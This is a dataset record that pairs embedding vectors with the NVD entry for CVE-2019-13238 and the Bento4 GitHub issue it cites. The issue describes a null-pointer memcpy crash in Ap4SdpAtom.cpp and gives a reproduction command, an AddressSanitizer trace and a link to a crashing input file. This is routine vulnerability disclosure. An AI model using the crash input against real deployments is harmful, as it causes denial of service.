-0.007221878971904516, -0.010632210411131382, 0.009089605882763863, 0.010770561173558235, -0.018746448680758476, -0.006070113740861416, 0.013413049280643463, 0.008965090848505497, 0.0027670033741742373, 0.001380907604470849, -0.035805024206638336, 0.014789633452892303, 0.012077969498932362, 0.013129430823028088, 0.022108357399702072, 0.0020406648982316256, -0.024916864931583405, -0.0010445438092574477, 0.00652666948735714, 0.00647824676707387, -0.0028206140268594027, 0.007519331760704517, 0.006357190199196339, -0.008038144558668137, -0.008674555458128452, -0.011849692091345787, 0.0020700644236057997, 0.0020596880931407213, 0.017556635662913322, 0.01237542275339365, -0.003470859955996275, 0.004977147560566664, 0.0029312942642718554, 0.003721619490534067, -0.011579909361898899, -0.017003236338496208, 0.012804307974874973, -0.017653482034802437, 0.009027348831295967, -0.009428564459085464, -0.004620895721018314, 0.003604021854698658, 0.011559156700968742, -0.009048101492226124, 0.01426390279084444, 0.005063616205006838, 0.000021576681319857016, 0.004319984000176191, 0.009470068849623203, 0.03384045138955116, 0.01391802728176117, 0.0014846702106297016, -0.007996640168130398, 0.011074931360781193, -0.0028690367471426725, -0.01743212155997753, -0.0151908490806818, -0.006543963216245174, 0.021070731803774834, -0.0201991256326437, 0.007208043709397316, 0.016325319185853004, -0.003621315583586693, -0.00419892743229866, 0.01334387343376875, -0.004741952288895845, 0.007643846794962883, -0.0013800429878756404, -0.0018365985015407205, -0.010611457750201225, -0.006983224768191576, -0.00617041764780879, -0.005132791120558977, -0.0012114286655560136, 0.0029572348576039076, 0.023173652589321136, -0.00804506242275238, 0.037548236548900604, 0.013198606669902802, -0.017681151628494263, 0.003915309906005859, 0.03367443010210991, 0.004333819262683392, -0.0026615113019943237, 0.006623514462262392, 0.0025006793439388275, -0.00897200871258974, 0.018179211765527725, 0.001584974117577076, -0.0095876669511199, 0.02872149460017681, -0.003218370722606778, -0.007962052710354328, -0.00801047496497631, 0.0016567432321608067, 0.0006264668772928417, -0.007540084421634674, -0.010189490392804146, -0.008252587169408798, 0.03076907806098461, 0.01542604435235262, 0.005416409112513065, -0.0002156317059416324, 0.015412208624184132, 0.023934578523039818, -0.0032788990065455437, 0.007228796370327473, -0.011725177057087421, 0.016076289117336273, 0.012555277906358242, -0.01173209398984909, 0.018165377900004387, 0.007263383828103542, -0.006582009140402079, -0.020890874788165092, 0.019535044208168983, -0.0005862588295713067, -0.011849692091345787, 0.0059836446307599545, -0.000012200214769109152, 0.00038586725713685155, 0.016947895288467407, 0.0018400573171675205, 0.0006701336242258549, -0.005751908291131258, -0.011787434108555317, 0.0005534006631933153, 0.006004397291690111, 0.0039118509739637375, -0.008861328475177288, -0.010154902935028076, -0.005776119418442249, -0.009857449680566788, 0.00479383347555995, 0.008487783372402191, 0.005872964859008789, -0.006042443681508303, 0.015121673233807087, 0.0019265260780230165, -0.00379079463891685, -0.01382118184119463, 0.004012154880911112, 0.00203547696582973, 0.00043882944737561047, -0.027158139273524284, 0.004997899755835533, 0.0019265260780230165, -0.006734194699674845, 0.020212959498167038, -0.015536723658442497, -0.013247028924524784, -0.00866072066128254, -0.03182053938508034, 0.013980284333229065, -0.00852237083017826, 0.009262544102966785, 0.002671887632459402, 0.01289423555135727, -0.00471082329750061, 0.0009416458196938038, -0.0011846233392134309, -0.01465128269046545, 0.01007189229130745, 0.005271141417324543, 0.024778515100479126, 0.009781356900930405, 0.0033861203119158745, 0.01382118184119463, 0.03464288264513016, 0.008100402541458607, 0.009214120917022228, -0.01763964630663395, 0.0024989498779177666, 0.003922227304428816, 0.0002738900948315859, -0.0007194209028966725, -0.011420806869864464, 0.0027739210054278374, 0.009207203984260559, 0.00817649532109499, -0.016339154914021492, 0.003422437235713005, 0.002006077440455556, 0.0314054898917675, -0.014914148487150669, -0.010708303190767765, -0.008224917575716972, 0.0042127626948058605, -0.006965931039303541, 0.00021422658755909652, -0.015024828724563122, 0.014637447893619537, -0.01737678050994873, 0.005821083206683397, -0.014955653809010983, 0.011614496819674969, -0.00589717598631978, -0.011496898718178272, 0.00910344161093235, 0.006779158487915993, -0.01732144132256508, -0.0005317834438756108, 0.008051980286836624, -0.007955134846270084, 0.02154112234711647, -0.01943819969892502, 0.0162146408110857, -0.013392296619713306, -0.0037527482490986586, -0.003123254980891943, 0.02102922648191452, -0.003953356295824051, 0.019576549530029297, 0.005464831832796335, 0.007187291514128447, -0.02866615541279316, 0.0012373693753033876, 0.02321515791118145, 0.0095599964261055, -0.013703584671020508, -0.01596560887992382, -0.02872149460017681, -0.010881240479648113, -0.011088766157627106, -0.002032018033787608, -0.01224398985505104, -0.010224077850580215, -0.017791831865906715, 0.01230624783784151, -0.013862687163054943, -0.012354670092463493, 0.01007189229130745, 0.03256763145327568, -0.005250388756394386, -0.004897595848888159, 0.017030905932188034, 0.013219358399510384, -0.009193369187414646, 0.04726041853427887, -0.006305309012532234, 0.008301010355353355, 0.015799589455127716, -0.0018348691519349813, 0.009470068849623203, -0.006537045352160931, -0.010044222697615623, 0.006824122276157141, 0.007173456251621246, -0.012914988212287426, -0.0008642562315799296, 0.015107838436961174, -0.017030905932188034, -0.021956171840429306, -0.004589766729623079, -0.0027531683444976807, 0.004351112991571426, -0.012084887363016605, -0.005859129596501589, -0.0023986459709703922, -0.005350692663341761, 0.0141670573502779, -0.013032586313784122, 0.0021150282118469477, 0.001083454815670848, 0.012486102990806103, -0.03115645796060562, 0.004133211448788643, 0.0007769226795062423, 0.02187316119670868, -0.016380660235881805, -0.012430762872099876, -0.006163500249385834, 0.005167379043996334, -0.0006774835055693984, 0.007173456251621246, 0.016629690304398537, -0.02090471051633358, -0.0012027818011119962, -0.008743730373680592, -0.00685870973393321, -0.015550559386610985, -0.004416828975081444, -0.01154532190412283, 0.007858289405703545, -0.026701582595705986, 0.020309805870056152, 0.015799589455127716, 0.028832174837589264, 0.0035123650450259447, 0.006263804156333208, 0.01209180522710085, 0.019258344545960426, -0.019452033564448357, -0.0042957728728652, 0.027905229479074478, -0.014077129773795605, -0.035805024206638336, -0.029606936499476433, -0.006851792335510254, -0.0012062405003234744, -0.01859426312148571, 0.008190330117940903, -0.02007460966706276, 0.00872297864407301, 0.013170936144888401, -0.0012071052333340049, -0.0064644115045666695, 0.03348074108362198, -0.014402252621948719, -0.00033895790693350136, -0.0029174592345952988, -0.011185611598193645, 0.008238752372562885, -0.017736492678523064, -0.0033480741549283266, -0.019382858648896217, -0.005122415255755186, -0.014319242909550667, -0.018137706443667412, -0.00086339155677706, 0.006602761801332235, 0.009345553815364838, 0.017681151628494263, -0.00948390457779169, -0.011600662022829056, -0.0013437260640785098, 0.012527608312666416, 0.008051980286836624, 0.02520740032196045, 0.013648244552314281, -0.009283296763896942, -0.01137930154800415, 0.013551399111747742, -0.006415989249944687, 0.0031111494172364473, 0.001779529033228755, 0.0053991153836250305, 0.013828099705278873, 0.01744595728814602, 0.011240951716899872, -0.018635768443346024, -0.0004773080872837454, -0.0035261998418718576, -0.0051431674510240555, 0.04277787357568741, -0.007934382185339928, -0.03002198599278927, -0.002230896381661296, 0.0067514884285628796, -0.004676235839724541, -0.011296291835606098, -0.008819823153316975, 0.005070533603429794, 0.011400054208934307, 0.021195245906710625, -0.006308767944574356, -0.010058057494461536, 0.014831137843430042, -0.006426365580409765, -0.012264742515981197, 0.012209402397274971, -0.0004842256021220237, -0.014118635095655918, -0.01247226819396019, -0.01326778158545494, 0.005153543781489134, 0.01430540718138218, 0.0044687106274068356, 0.011711342260241508, -0.005648145917803049, 0.02398991957306862, 0.018123872578144073, 0.00662005553022027, 0.013364626094698906, -0.010908911004662514, -0.006543963216245174, 0.017030905932188034, 0.015370704233646393, -0.0030955851543694735, 0.02245423197746277, -0.001508016837760806, 0.00226029590703547, -0.013482224196195602, -0.001244286890141666, -0.01635299064218998, -0.013330038636922836, 0.002530078636482358, -0.005461372900754213, 0.0064298240467906, 0.014499098062515259, 0.0118911974132061, -0.01185660995543003, 0.0013523729285225272, 0.011068013496696949, 0.0003361476701684296, 0.04109000042080879, -0.03301034867763519, -0.01205721776932478, 0.0034276254009455442, 0.03179286792874336, 0.01557822898030281, -0.017874842509627342, -0.0006178199546411633, -0.004658942110836506, 0.014374583028256893, -0.0028846010100096464, 0.03306569159030914, 0.007816785015165806, -0.03384045138955116, -0.008162659592926502, 0.0013186500873416662, -0.01035550981760025, 0.02545643039047718, 0.014139387756586075, 0.021250586956739426, 0.005326481536030769, 0.020614175125956535, 0.0006861303700134158, 0.002552560530602932, 0.014623613096773624, -0.0024487979244440794, 0.01289423555135727, 0.010639128275215626, -0.005139708984643221, -0.002514514373615384, -0.021056896075606346, 0.01099883858114481, 0.011704424396157265, 0.012541443109512329, -0.022924622520804405, 0.017404451966285706, 0.011012673377990723, -0.012783555313944817, 0.027808384969830513, 0.002232625847682357, 0.012652123346924782, 0.019133828580379486, -0.012880400754511356, 0.010348592884838581, -0.011635249480605125, -0.00009198124462272972, -0.010646045207977295 ]
2,273
CVE-2019-13238
2019-07-04T14:15:10.853000
An issue was discovered in Bento4 1.5.1.0. A memory allocation failure is unhandled in Core/Ap4SdpAtom.cpp and leads to crashes. When parsing input video, the program allocates a new buffer to parse an atom in the stream. The unhandled memory allocation failure causes a direct copy to a NULL pointer.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ], "cvssMetricV31": null }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/396" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.5.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "83B32974-D913-4DDB-844F-C58D55ECC17E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/axiomatic-systems/Bento4/issues/396
[ "Exploit", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
A memory allocation failure unhandled in Ap4SdpAtom.cpp and leads to crashes. `./mp42aac input_file /dev/null` In file Source/C++/Core/Ap4SdpAtom.cpp <img width="640" alt="image" src="https://user-images.githubusercontent.com/7632714/58334121-73c1dd80-7e71-11e9-88a2-c9fbd2129068.png"> AP4_SdpAtom allocate a new buffer to parse the atom in the stream. The unhandled memory allocation failure cause the read content memcpy to a null pointer. <img width="553" alt="image" src="https://user-images.githubusercontent.com/7632714/58333799-d23a8c00-7e70-11e9-9bc3-89b928919860.png"> This is the start points. In file In file Source/C++/Core/Ap4ByteStream.cpp ![image](https://user-images.githubusercontent.com/7632714/58333856-ec746a00-7e70-11e9-9433-39bfc5eaecd1.png) ![image](https://user-images.githubusercontent.com/7632714/58333942-19288180-7e71-11e9-9483-a6682b51c009.png) AP4_CopyMemory is the macro define of memcpy and the path formed. Asan trace report: > ==79431==AddressSanitizer CHECK failed: ../../../../../src/libsanitizer/sanitizer_common/sanitizer_allocator.cc:147 "((0)) != (0)" (0x0, 0x0) #0 0xf725e797 (/usr/lib32/libasan.so.2+0x9f797) #1 0xf7263a69 in __sanitizer::CheckFailed(char const*, int, char const*, unsigned long long, unsigned long long) (/usr/lib32/libasan.so.2+0xa4a69) #2 0xf71d507b (/usr/lib32/libasan.so.2+0x1607b) #3 0xf7261e80 (/usr/lib32/libasan.so.2+0xa2e80) #4 0xf71da229 (/usr/lib32/libasan.so.2+0x1b229) #5 0xf7256e16 in operator new[](unsigned int) (/usr/lib32/libasan.so.2+0x97e16) #6 0x873013b in AP4_SdpAtom::AP4_SdpAtom(unsigned int, AP4_ByteStream&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4SdpAtom.cpp:60 #7 0x82dcab1 in AP4_SdpAtom::Create(unsigned int, AP4_ByteStream&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4SdpAtom.h:54 #8 0x82dcab1 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4AtomFactory.cpp:595 #9 0x83016d3 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4AtomFactory.cpp:221 #10 0x82b6bae in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4ContainerAtom.cpp:194 #11 0x82b6bae in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4ContainerAtom.cpp:139 #12 0x82be680 in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4ContainerAtom.cpp:88 #13 0x82dc711 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4AtomFactory.cpp:764 #14 0x82fa1f7 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4AtomFactory.cpp:221 #15 0x82fa1f7 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, AP4_Atom*&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4AtomFactory.cpp:151 #16 0x809a044 in AP4_File::ParseStream(AP4_ByteStream&, AP4_AtomFactory&, bool) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4File.cpp:104 #17 0x809a044 in AP4_File::AP4_File(AP4_ByteStream&, bool) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4File.cpp:78 #18 0x8082ce7 in main /mnt/data/playground/mp42-a/Source/C++/Apps/Mp42Aac/Mp42Aac.cpp:250 #19 0xf69df636 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x18636) #20 0x808df1b (/mnt/data/playground/mp42-a/Build/mp42aac+0x808df1b) [input_file.zip](https://github.com/axiomatic-systems/Bento4/files/3217304/input_file.zip)
Exhaustive memory misunhandle
https://api.github.com/repos/axiomatic-systems/Bento4/issues/396/comments
0
2019-05-24T14:17:26
2019-08-25T16:31:09Z
https://github.com/axiomatic-systems/Bento4/issues/396
448,195,676
396
true
This is a GitHub Issue repo:Bento4 owner:axiomatic-systems Title : Exhaustive memory misunhandle Issue date: --- start body --- A memory allocation failure unhandled in Ap4SdpAtom.cpp and leads to crashes. `./mp42aac input_file /dev/null` In file Source/C++/Core/Ap4SdpAtom.cpp <img width="640" alt="image" src="https://user-images.githubusercontent.com/7632714/58334121-73c1dd80-7e71-11e9-88a2-c9fbd2129068.png"> AP4_SdpAtom allocate a new buffer to parse the atom in the stream. The unhandled memory allocation failure cause the read content memcpy to a null pointer. <img width="553" alt="image" src="https://user-images.githubusercontent.com/7632714/58333799-d23a8c00-7e70-11e9-9bc3-89b928919860.png"> This is the start points. In file In file Source/C++/Core/Ap4ByteStream.cpp ![image](https://user-images.githubusercontent.com/7632714/58333856-ec746a00-7e70-11e9-9433-39bfc5eaecd1.png) ![image](https://user-images.githubusercontent.com/7632714/58333942-19288180-7e71-11e9-9483-a6682b51c009.png) AP4_CopyMemory is the macro define of memcpy and the path formed. Asan trace report: > ==79431==AddressSanitizer CHECK failed: ../../../../../src/libsanitizer/sanitizer_common/sanitizer_allocator.cc:147 "((0)) != (0)" (0x0, 0x0) #0 0xf725e797 (/usr/lib32/libasan.so.2+0x9f797) #1 0xf7263a69 in __sanitizer::CheckFailed(char const*, int, char const*, unsigned long long, unsigned long long) (/usr/lib32/libasan.so.2+0xa4a69) #2 0xf71d507b (/usr/lib32/libasan.so.2+0x1607b) #3 0xf7261e80 (/usr/lib32/libasan.so.2+0xa2e80) #4 0xf71da229 (/usr/lib32/libasan.so.2+0x1b229) #5 0xf7256e16 in operator new[](unsigned int) (/usr/lib32/libasan.so.2+0x97e16) #6 0x873013b in AP4_SdpAtom::AP4_SdpAtom(unsigned int, AP4_ByteStream&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4SdpAtom.cpp:60 #7 0x82dcab1 in AP4_SdpAtom::Create(unsigned int, AP4_ByteStream&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4SdpAtom.h:54 #8 0x82dcab1 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4AtomFactory.cpp:595 #9 0x83016d3 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4AtomFactory.cpp:221 #10 0x82b6bae in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4ContainerAtom.cpp:194 #11 0x82b6bae in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4ContainerAtom.cpp:139 #12 0x82be680 in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4ContainerAtom.cpp:88 #13 0x82dc711 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4AtomFactory.cpp:764 #14 0x82fa1f7 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4AtomFactory.cpp:221 #15 0x82fa1f7 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, AP4_Atom*&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4AtomFactory.cpp:151 #16 0x809a044 in AP4_File::ParseStream(AP4_ByteStream&, AP4_AtomFactory&, bool) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4File.cpp:104 #17 0x809a044 in AP4_File::AP4_File(AP4_ByteStream&, bool) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4File.cpp:78 #18 0x8082ce7 in main /mnt/data/playground/mp42-a/Source/C++/Apps/Mp42Aac/Mp42Aac.cpp:250 #19 0xf69df636 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x18636) #20 0x808df1b (/mnt/data/playground/mp42-a/Build/mp42aac+0x808df1b) [input_file.zip](https://github.com/axiomatic-systems/Bento4/files/3217304/input_file.zip) --- end body ---
4,109
[ -0.0262508112937212, 0.0132114477455616, -0.006148133892565966, -0.010098271071910858, 0.01817845180630684, -0.006746520753949881, -0.038359347730875015, 0.03851579129695892, -0.022277208045125008, 0.0245299581438303, -0.025499893352389336, 0.024154501035809517, 0.02351309172809124, 0.01681741513311863, 0.030380854383111, -0.024858485907316208, -0.015292113646864891, -0.009128335863351822, -0.01700514368712902, -0.006488393060863018, 0.03607530891895294, -0.036450766026973724, -0.012374487705528736, 0.036137886345386505, -0.02213641069829464, 0.016050852835178375, -0.020118320360779762, -0.009136158041656017, 0.0034221482928842306, -0.007450505625456572, -0.0015575663419440389, 0.008307020179927349, -0.007747743744403124, 0.013680770993232727, 0.03175753727555275, 0.0025793220847845078, 0.05847766995429993, 0.027596203610301018, 0.02007138915359974, 0.015558063983917236, -0.003508190857246518, -0.04564950242638588, -0.0459623858332634, 0.012961141765117645, -0.014181382022798061, 0.012507462874054909, 0.0015301891835406423, 0.007720366585999727, -0.04965439438819885, 0.0020532889757305384, 0.01770912855863571, 0.0014803236117586493, -0.022261563688516617, -0.0759052038192749, 0.00866683479398489, -0.010669280774891376, 0.023841617628932, 0.04223908856511116, 0.0034241038374602795, 0.01517478283494711, -0.011310689151287079, -0.0034377924166619778, 0.013422642834484577, 0.03350967541337013, 0.013187981210649014, 0.019711574539542198, -0.021244697272777557, 0.008737233467400074, -0.04902862757444382, 0.03676364943385124, -0.02575019933283329, -0.028894664719700813, 0.02592228353023529, 0.038703519850969315, 0.006695677526295185, -0.018929367884993553, 0.030584227293729782, 0.0438973642885685, -0.028722578659653664, 0.04186362773180008, -0.03604402020573616, 0.020650221034884453, -0.024248365312814713, 0.029270123690366745, 0.04289614036679268, 0.014439510181546211, -0.03172624856233597, -0.0648917555809021, -0.012812523171305656, -0.028738223016262054, -0.0004373016708996147, 0.010950874537229538, 0.031319502741098404, 0.009362997487187386, 0.014236136339604855, 0.023106345906853676, -0.025108790025115013, -0.023262785747647285, -0.06198194995522499, -0.014838434755802155, -0.026047436520457268, -0.01004351582378149, 0.001353215193375945, 0.030584227293729782, 0.008393063209950924, -0.002573455451056361, 0.013539973646402359, -0.018287960439920425, 0.03225814551115036, 0.12728044390678406, 0.02576584368944168, 0.002632120857015252, -0.017192872241139412, -0.019805438816547394, 0.010231245309114456, -0.006883407011628151, 0.00506869051605463, -0.03842192515730858, -0.042990002781152725, -0.04552435129880905, -0.028284544125199318, -0.01955513283610344, -0.03188268840312958, -0.0033243726938962936, -0.01648888736963272, 0.04787096381187439, 0.024639466777443886, -0.034229304641485214, -0.01736495830118656, -0.02488977275788784, -0.0075795697048306465, -0.022042546421289444, 0.0008188711944967508, -0.016911279410123825, 0.001583965728059411, -0.02144807018339634, -0.03041214309632778, 0.022918615490198135, 0.016504531726241112, -0.015839656814932823, -0.06651873886585236, 0.0034456143621355295, 0.03710782155394554, 0.000538255029823631, -0.02111954428255558, 0.001775606069713831, -0.0296925138682127, 0.018491333350539207, -0.01681741513311863, 0.003224641317501664, -0.003146420931443572, -0.027424117550253868, 0.0276274923235178, -0.0007372284890152514, 0.029989751055836678, 0.01304718479514122, -0.00341237080283463, 0.01802201010286808, -0.01563628390431404, 0.009112691506743431, -0.004458570387214422, -0.026125658303499222, 0.026016149669885635, -0.024248365312814713, -0.003451480995863676, -0.03156980499625206, 0.022793462499976158, 0.004552435129880905, -0.005021757911890745, 0.027392830699682236, -0.001610365230590105, 0.012257156893610954, -0.003584455931559205, 0.01046590693295002, -0.05591203644871712, -0.025499893352389336, -0.00432559521868825, 0.04818384721875191, -0.03332194685935974, -0.011287222616374493, 0.0020259118173271418, 0.004634566605091095, 0.021150831133127213, 0.008307020179927349, 0.006238087546080351, -0.03375998139381409, 0.027674423530697823, -0.05988563969731331, 0.03757714480161667, 0.005498903337866068, 0.007532637100666761, -0.005600590258836746, 0.024342229589819908, -0.00434123957529664, 0.0359814427793026, -0.012937676161527634, -0.02160451002418995, -0.013399177230894566, -0.0023759487085044384, 0.011349799111485481, 0.002671231050044298, -0.014728926122188568, -0.014932299964129925, 0.023591311648488045, -0.05115622654557228, 0.0020298229064792395, -0.024811552837491035, 0.052783213555812836, 0.027658779174089432, -0.025609401986002922, -0.02077537402510643, -0.023716464638710022, -0.005373750347644091, 0.00162112049292773, -0.0064375498332083225, 0.001688585733063519, -0.037358127534389496, 0.006938161328434944, -0.012992430478334427, -0.019164029508829117, 0.04480472207069397, -0.002368126530200243, 0.04449183866381645, 0.0018655597232282162, -0.008815454319119453, -0.018068943172693253, -0.019946236163377762, 0.001647519995458424, -0.0043842606246471405, 0.006124667823314667, 0.04255196824669838, 0.015229537151753902, -0.023591311648488045, -0.004044001456350088, 0.04020535200834274, 0.010833543725311756, -0.009722812101244926, -0.01355561800301075, 0.0072784204967319965, 0.01108384970575571, -0.015143495053052902, 0.03122563660144806, -0.023450516164302826, -0.028722578659653664, 0.0007597169023938477, 0.07139970362186432, -0.014963587746024132, 0.0002806161646731198, -0.013500863686203957, 0.0017775616142898798, 0.036106597632169724, -0.012077250517904758, -0.002156931208446622, 0.02005574479699135, -0.010716212913393974, 0.011850410141050816, 0.036106597632169724, 0.0031385987531393766, -0.027721356600522995, -0.033415812999010086, 0.024811552837491035, -0.010020050220191479, -0.00979321077466011, -0.014940121211111546, -0.000189562575542368, -0.02077537402510643, -0.034761205315589905, -0.0053893947042524815, -0.01611343026161194, -0.022762175649404526, 0.03964216634631157, 0.0002527500910218805, -0.012577861547470093, -0.042833562940359116, 0.001708140829578042, -0.005135178100317717, 0.022934259846806526, 0.007642145734280348, -0.011553172953426838, 0.0055614798329770565, 0.003169887000694871, 0.014032763428986073, -0.017130296677350998, 0.02936398796737194, 0.008526038378477097, 0.0009230022551491857, 0.024451738223433495, -0.03153852000832558, -0.028237611055374146, -0.003582500386983156, 0.004798829555511475, -0.007344908080995083, -0.07171258330345154, 0.009003182873129845, 0.009026649408042431, 0.01921096257865429, 0.010575415566563606, -0.009167446754872799, -0.019351759925484657, 0.0007264731684699655, -0.025812774896621704, -0.007657790090888739, 0.0043177735060453415, 0.003989247139543295, -0.03000539541244507, 0.027392830699682236, -0.018835503607988358, -0.0017100963741540909, 0.010066982358694077, -0.0185069777071476, 0.053315114229917526, -0.0480274073779583, -0.013641661033034325, -0.00969934556633234, -0.01458030752837658, -0.009237844496965408, -0.0052720638923347, -0.03745198994874954, -0.032508451491594315, 0.032539740204811096, -0.0511249378323555, 0.0004942559753544629, -0.03557469695806503, 0.0067699868232011795, 0.021401137113571167, -0.009214378893375397, -0.014306535013020039, 0.043678343296051025, -0.06476660072803497, 0.010622348636388779, 0.006167688872665167, -0.011842588894069195, -0.008361774496734142, -0.018679063767194748, 0.003969692159444094, -0.041143998503685, -0.007219755090773106, 0.006734787952154875, 0.008752877824008465, -0.0042825741693377495, -0.018632130697369576, -0.005099978763610125, 0.005803963635116816, -0.0019574689213186502, -0.009675879962742329, 0.0001943291281349957, 0.0035629451740533113, -0.022902971133589745, -0.005569302011281252, 0.009668057784438133, 0.0011224646586924791, 0.016222938895225525, 0.01028599962592125, 0.019085809588432312, 0.00919091235846281, -0.03604402020573616, -0.02645418420433998, -0.0022586178965866566, 0.031131772324442863, -0.02025911770761013, 0.0022097299806773663, -0.015401622280478477, 0.010747500695288181, 0.0009098025620914996, 0.01517478283494711, 0.020118320360779762, -0.0027924729511141777, -0.01064581423997879, -0.002461991272866726, -0.010356398299336433, 0.0023348829708993435, 0.059291161596775055, -0.020024456083774567, 0.02354438044130802, -0.006081646308302879, -0.01786557026207447, 0.02370082028210163, 0.01681741513311863, -0.033415812999010086, 0.008127112872898579, -0.027580559253692627, 0.00557321310043335, 0.012585683725774288, -0.0600733682513237, 0.019680285826325417, 0.005268152803182602, -0.010231245309114456, 0.04208264499902725, -0.0017413846217095852, -0.003529701381921768, -0.043521903455257416, 0.047464217990636826, -0.038891248404979706, -0.060323674231767654, -0.015166960656642914, 0.03998633474111557, -0.017959434539079666, -0.016082141548395157, 0.013281846418976784, -0.059635333716869354, 0.02661062404513359, -0.028440985828638077, 0.017099007964134216, 0.011138604022562504, 0.015080918557941914, 0.04543048515915871, -0.00042287976248189807, -0.014290891587734222, 0.020462490618228912, -0.0013346378691494465, 0.046619437634944916, -0.015589351765811443, -0.02182352915406227, -0.006500126328319311, 0.02366953343153, 0.03447961062192917, -0.019836727529764175, 0.009316065348684788, -0.022558800876140594, 0.03726426139473915, -0.009128335863351822, -0.0050530461594462395, 0.012929853983223438, 0.0007685167365707457, 0.033228080719709396, 0.02471768856048584, -0.0031601095106452703, 0.006863851565867662, 0.010426796972751617, -0.03892253711819649, 0.0014441466191783547, 0.00032461521914228797, 0.005432415753602982, 0.01974286139011383, -0.007868985645473003, -0.04721391201019287, -0.028769511729478836, -0.023278430104255676, -0.01425960287451744, -0.022183341905474663, -0.026329031214118004, 0.05196972191333771, -0.04621269181370735, 0.0007118068169802427, 0.002156931208446622, -0.05900957062840462, -0.006789542268961668, -0.01501051988452673, 0.00868247915059328, -0.01922660693526268, -0.003815206466242671, 0.02676706574857235, 0.016754837706685066, 0.0071063353680074215, 0.011013451032340527, 0.02110389992594719, 0.0028315831441432238, -0.0047558085061609745, 0.021541934460401535, -0.016786126419901848, -0.006026891991496086, 0.017036432400345802, 0.02143242582678795, -0.002037644851952791, 0.021839171648025513, 0.03498022258281708, -0.024983637034893036, -0.002229285193607211, 0.006719143595546484, -0.01975850574672222, 0.009761922061443329, -0.008283554576337337, 0.0015692993765696883, 0.011122959665954113, 0.003527746070176363, 0.015041808597743511, -0.02833147719502449, -0.025797130540013313, 0.006238087546080351, -0.06827087700366974, -0.010113914497196674, -0.022026902064681053, -0.03160109370946884, -0.011381087824702263, 0.01211636047810316, -0.0062654647044837475, -0.009785388596355915, 0.015495487488806248, -0.0205719992518425, -0.01819409616291523, 